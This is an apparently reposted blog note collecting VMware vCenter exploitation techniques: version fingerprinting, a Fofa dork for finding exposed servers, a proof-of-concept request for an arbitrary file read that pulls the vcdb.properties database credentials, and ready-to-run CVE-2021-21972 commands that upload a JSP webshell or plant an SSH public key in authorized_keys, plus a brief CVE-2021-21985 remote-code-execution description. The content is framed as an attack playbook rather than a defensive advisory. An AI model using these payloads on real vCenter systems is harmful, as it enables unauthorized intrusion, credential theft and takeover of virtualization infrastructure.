首页 > 其他分享 >Vcenter LH Exploit

Vcenter LH Exploit

时间:2024-02-22 15:13:12浏览次数:22  
标签:LH Exploit version 2021 file path Vcenter CVE VMware

Common Loophole

Fingerprint Feature

title="+ ID_VC_Welcome +"

 Search for Vcenter version

Method 1

route: /sdk/vimServiceVersions.xml

Method 2

By calling the SOAP API of the VMWare Sphere component, I can obtain its version information,XML data is as follows:

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>

arbitrary file load

Impact version: VMware vCenter Server <=6.5.0

Fofa Dork: title="ID_VC_Welcome" 

Vmware Vcenter exists arbitrary file read that can read the manage account password from vCetner configuration to control the vCenter platform.

The database configurate file locate at different directory due to system version.Here is official file shows the location breifly:

vCenter Server 5.5 or lower than 5.5

Windows 2008 - C:\ProgramData\VMware\VMware VirtualCenter

Other Windows version - C:\Documents and Settings\All Users\Application Data\VMware\VMware VirtualCenter\

vCenter Server 6.0 6.5 6.7

  • C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx

POC: 

GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}

CVE-2021-21972

Enabled by default vROps plugin(com.vmware.vropspluginui.mvc) unauthorized access the ServicesController class uploadova interface,can use the path through the file decompression to realize getshell specifc directory.

Impact version:

  • 7.0 <= vCenter Server < 7.0 U1c
  • 6.7 <= vCenter Server < 6.7 U3l
  • 6.5 1e <= vCenter Server < 6.5 U3n
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.1.2
/ui/vropspluginui/rest/services/uploadova

The vulnerability don't exists if access the path above with 404,but 405 means it may be a vulnerability.

Windows machine:

https://github.com/horizon3ai/CVE-2021-21972.git

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t (目标地址)
-f (上传的文件)
-p (上传后的webshell路径,默认不用改)

The upload path is  https://x.x.x.x/statsreport/gsl.jsp

Completely path is 

C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

Linux machine

1.Write public/secret key( need 22 port open)

python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub

CVE-2021-21985

Enabled by default Virtual SAN Health Check plugin (vsan-h5-client.zip) unauthenticated access the /rest/* interface,can use unsafe reflection calls implement RCE.

Impact version:

  • 7.0 <= vCenter Server < 7.0 U2b
  • 6.7 <= vCenter Server < 6.7 U3n
  • 6.5 <= vCenter Server < 6.5 U3p
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2.1
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.2.1

https://www.geekby.site/2022/05/vcenter%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#3-%E5%90%8E%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95

follow please learn from it

标签:LH,Exploit,version,2021,file,path,Vcenter,CVE,VMware
From: https://www.cnblogs.com/lisenMiller/p/18027388

相关文章

  • 解密prompt系列24. RLHF新方案之训练策略:SLiC-HF & DPO & RRHF & RSO
    去年我们梳理过OpenAI,Anthropic和DeepMind出品的经典RLHF论文。今年我们会针对经典RLHF算法存在的不稳定,成本高,效率低等问题讨论一些新的方案。不熟悉RLHF的同学建议先看这里哦解密Prompt7.偏好对齐RLHF-OpenAI·DeepMind·Anthropic对比分析RLHF算法当前存在的一些问题有RL的......
  • 【工具使用】【WireShark】WireShark如何抓取本地localhost的包
    1 抓包今儿想抓一下自己本地服务的请求的包数据,发现 WireShark上抓不到,百度搜了搜尝试了下可以,这里简单记录下:主要是看看上传一个文件时的交互,会发现当你上传一个文件的话,他会先将一次TCP的请求,并且标志位的PUSH标志位开启,以及文件的大小、文件名称发送给后端,PUSH就是数据......
  • dotnet_sqlite_sqlhelper_数据库连接_数据库依赖注入
    DI魅力渐显_依赖注入\Program.csservices.AddScoped<IDbConnection>(sp=>{stringconnStr="DataSource=test.db";varconn=newSqliteConnection(connStr);conn.Open();returnconn;});DI魅力渐显_依赖注入\UserDAO.csprivatereadonly......
  • 【转帖】localhost和127.0.0.1的区别
    plantegg.github.io/2023/09/24/localhost和127.0.0.1的区别/背景有人告诉我localhost和127.0.0.1的区别是localhost不经过网卡,把我惊到了,因为我还真不知道这个知识点,于是去特别去验证了一下,这是个错误的理解,localhost会解析成127.0.0.1然后接下来的流程和127.0.0.1一模一......
  • ChatGPT 背后的“功臣”——RLHF 技术详解
    OpenAI推出的ChatGPT对话模型掀起了新的AI热潮,它面对多种多样的问题对答如流,似乎已经打破了机器和人的边界。这一工作的背后是大型语言模型(LargeLanguageModel,LLM)生成领域的新训练范式:RLHF(ReinforcementLearningfromHumanFeedback),即以强化学习方式依据人类反馈......
  • MetaSploit 开发 Exploit
    MetaSploit开发Exploit1.安装MetaSploit1.1下载​ metasploit-framework官网下载:DirectoryTree(metasploit.com)​ 下载最新安装包即可:如下图1.2安装​ 双击下载的metasploitframework-latest.msi,一直点next,最后选择安装目录即可1.3环境变量我的电脑--属性......
  • LLM面面观之RLHF平替算法DPO
    1.背景最近本qiang~老看到一些关于大语言模型的DPO、RLHF算法,但都有些云里雾里,因此静下心来收集资料、研读论文,并执行了下开源代码,以便加深印象。此文是本qiang~针对大语言模型的DPO算法的整理,包括原理、流程及部分源码。2.DPOvsRLHF  上图左边是RLHF算法,右边为DPO算......
  • 访问localhost失败拒绝访问
    一:初次使用java来利用serverSocket时,出现拒绝访问二:解决步骤如下<1>在开始里面搜索控制面板<2>找到程序,再在里面找到程序和功能<3>在里面找到启动和关闭windows功能<3>在程序和功能里面找到点击选中“InternetInformationService”及其下的“FTP服务器,其下的大选项的选上,然后点击......
  • java报错javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorEx
    解决办法:1、用浏览器登录该https网站,在浏览器地址栏里找到“证书信息”->“详细信息”->“复制到文件”->选择DER编码二进制X.509(.CER)(D)导出证书,如证书名为pro1.cer;2、在jdk的jre/bin包里执行keytool-import-aliaspro1-keystore/usr/java/jdk1.8.0/jre/lib/security/c......
  • LLM成功不可或缺的RLHF基于人类反馈的强化学习是如何运作的?OJAC近屿智能带你揭秘
    基于人类反馈的强化学习(RLHF,ReinforcementLearningfromHumanFeedback)是人工智能(AI)领域的一个新兴研究领域,它将强化学习技术与人类反馈相结合,以训练能够学习复杂任务的个体。该方法在提高人工智能系统的性能方面显示出前景,使其在各种应用中更具有适应性和效率。 强化学习......